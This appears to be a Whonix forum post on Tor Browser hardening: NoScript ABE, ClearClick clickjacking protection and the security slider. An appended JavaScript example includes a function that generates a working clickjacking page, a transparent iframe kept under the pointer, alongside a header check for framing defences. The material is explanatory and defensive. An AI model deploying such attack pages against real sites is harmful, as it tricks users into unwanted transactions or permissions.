Hi,
Re: jessie-proposed-updates -> doing this already, and 2.8.10 is working nicely.
Re: NoScript and ABE -> It is not required, as Tor Browser now blocks all access to 127.0.0.1 by default. So scrap that recommendation.
See https://trac.torproject.org/projects/tor/ticket/11493
Re: NoScript and ClearClick (clickjacking) protection, it is not enabled by default because certain false positives occur, typically on webpages relating to CAPTCHAs, some banking websites, some embedded PDFs, etc.
An open ticket exists, with the feature having been temporarily disabled. I think we can recommend users set it to on, with a suitable warning about false positives.
See here: https://trac.torproject.org/projects/tor/ticket/14985
For interested readers, Clickjacking refers to:
https://noscript.net/faq#qa8_1
By “Clickjacking” we designate a class of attacks (also known as “UI Redressing”) which consists of hiding or disguising a user interface element from a site you trust (e.g. the “Send” button of your webmail site or a pre-configured “Donate” PayPal button) in a way which leads you to click it without knowing exactly what you’re doing. In the impressive proof of concept by RSnake and Jeremiah, you clicked anywhere in their apparently innocuous page, believing you were doing nothing dangerous, but in reality you were activating your microphone and/or your webcam for Flash access, allowing the remote attacker to spy on you instantaneously.
More generally, an attacker can frame a portion of a certain web page you trust inside a different page under his control, decontextualizing it or making it transparent: this way he can easily trick you into interacting with it, and you end up performing a financial transaction or allowing him special permissions, without remotely suspecting that something evil is going on.
If JavaScript is allowed on the malicious site, this becomes much easier because the invisible target page can be automatically positioned exactly under your mouse pointer, so anywhere you click, the evildoer wins. However, this attack can work even without JavaScript being allowed: the attacker just needs to trick you into clicking on a seemingly innocuous link or button.
Every web browser is affected, because this attack doesn’t rely on any vulnerability or bug which might be fixed overnight: instead, it exploits very basic and standard web features which are implemented everywhere and are unlikely to be removed any time soon.
These recommendations (and those you vetted further above) could be added to a “Safe Tor Browser Settings and Use” section in the security guide. The guides could probably all be re-worked, but getting around to the Quick-Start guide is probably a higher priority.
Of interest, have you noticed the hardened Tor Browser privacy slider on first run states “You have unusual customized settings” and does not let you change the low-medium-high setting, unless you first select the button to “reset to default”?
I wonder if this is changing any standard Whonix changes and could possibly be a security/privacy risk if users revert to ‘standard’ TBB settings in the first instance. It’s worth investigating the differences via the ‘user set’ preferences in about:config with TBB hardened (not accepting this change) and TBB hardened (accepting this change).
Most importantly, the changes avoiding stacked tor do not seem to be affected (I checked - the relevant Whonix string is there for both).
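The clickjacking mechanism quoted from the NoScript FAQ above, as an added example that is not code from this post, from NoScript or from Tor Browser. The first function builds the attacker page the FAQ describes (a visible decoy with a transparent iframe of a trusted page that is kept under the mouse pointer by script); the second decides, from a target site's response headers, whether an attacker origin could frame that page at all, which is the server-side condition the attack depends on and the thing ClearClick guards against on the client. The origins, URLs and header sets are constructed for the demonstration; the precedence rule (a CSP `frame-ancestors` directive overrides `X-Frame-Options`) is the one CSP Level 2 specifies, and the obsolete `ALLOW-FROM` value is treated as unenforced, which is how current browsers behave.

```javascript
// Added example, not code from the post, NoScript or Tor Browser.
// Runs under Node without a DOM: the attacker page is produced as a string.

// Minimal escaping so the trusted URL or decoy text cannot break out of
// the HTML attribute or element it is placed in.
function escapeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Attacker page. The iframe is opacity 0 and absolutely positioned; on each
// mousemove it is shifted so that the control at (offsetX, offsetY) inside
// the framed trusted page sits exactly under the pointer. Whatever the
// victim clicks on the decoy, the click lands on that control.
function buildClickjackPage(trustedUrl, decoyText, offsetX, offsetY) {
  const ox = Number(offsetX), oy = Number(offsetY);
  return [
    "<!doctype html><html><body>",
    `<p>${escapeAttr(decoyText)}</p>`,
    `<iframe id="t" src="${escapeAttr(trustedUrl)}"`,
    '  style="position:absolute;opacity:0;width:600px;height:400px;border:0"></iframe>',
    "<script>",
    'document.addEventListener("mousemove", function (e) {',
    '  var f = document.getElementById("t");',
    `  f.style.left = (e.pageX - ${ox}) + "px";`,
    `  f.style.top  = (e.pageY - ${oy}) + "px";`,
    "});",
    "</script></body></html>",
  ].join("\n");
}

// Parse a Content-Security-Policy value into directive -> source tokens.
function parseCsp(value) {
  const out = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

// Does one frame-ancestors source expression admit the framing origin?
// Handles 'none', 'self', '*', a full origin and a bare host. The host
// wildcard form (*.example) is deliberately not implemented here.
function sourceMatches(src, pageOrigin, framerOrigin) {
  const s = src.replace(/^'|'$/g, "").toLowerCase();
  if (s === "none") return false;
  if (s === "self") return framerOrigin === pageOrigin;
  if (s === "*") return true;
  const framerHost = framerOrigin.replace(/^[a-z]+:\/\//, "");
  return s === framerOrigin || s === framerHost;
}

// True when a document served with `headers` by `pageOrigin` can be framed
// by `framerOrigin`. A CSP frame-ancestors directive, when present, is
// authoritative and X-Frame-Options is ignored (CSP Level 2). ALLOW-FROM is
// obsolete and treated as unenforced. With no header at all, any origin may
// frame the page, which is exactly the state a clickjacking page needs.
function framingAllowed(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const page = pageOrigin.toLowerCase(), framer = framerOrigin.toLowerCase();

  if (h["content-security-policy"]) {
    const fa = parseCsp(h["content-security-policy"])["frame-ancestors"];
    if (fa) return fa.some((src) => sourceMatches(src, page, framer));
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framer === page;
  return true;
}

// Constructed header sets standing in for real responses; a real check
// would fetch the page and read its headers.
const cases = {
  unprotected: {},
  xfoDeny: { "X-Frame-Options": "DENY" },
  xfoSameOrigin: { "X-Frame-Options": "SAMEORIGIN" },
  cspOverridesXfo: {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy":
      "default-src 'self'; frame-ancestors 'self' https://partner.example",
  },
};

// Which of the constructed responses a given framer origin could embed.
function summarize(pageOrigin, framerOrigin) {
  const r = {};
  for (const [name, headers] of Object.entries(cases)) {
    r[name] = framingAllowed(headers, pageOrigin, framerOrigin);
  }
  return r;
}

const page = "https://webmail.example";   // constructed trusted site
const attacker = "https://evil.example";  // constructed attacker origin
console.log("framable by attacker:", summarize(page, attacker));
console.log("framable by itself:  ", summarize(page, page));
console.log(buildClickjackPage(page + "/send", "Click anywhere to continue", 120, 60));
```

Only the `unprotected` response can be framed by the attacker origin, so that is the only case in which the generated page would work; note that the `cspOverridesXfo` response is framable by the site itself and by `https://partner.example` even though it also carries `X-Frame-Options: DENY`, because the CSP directive wins. ClearClick is the complementary client-side check for sites that ship neither header.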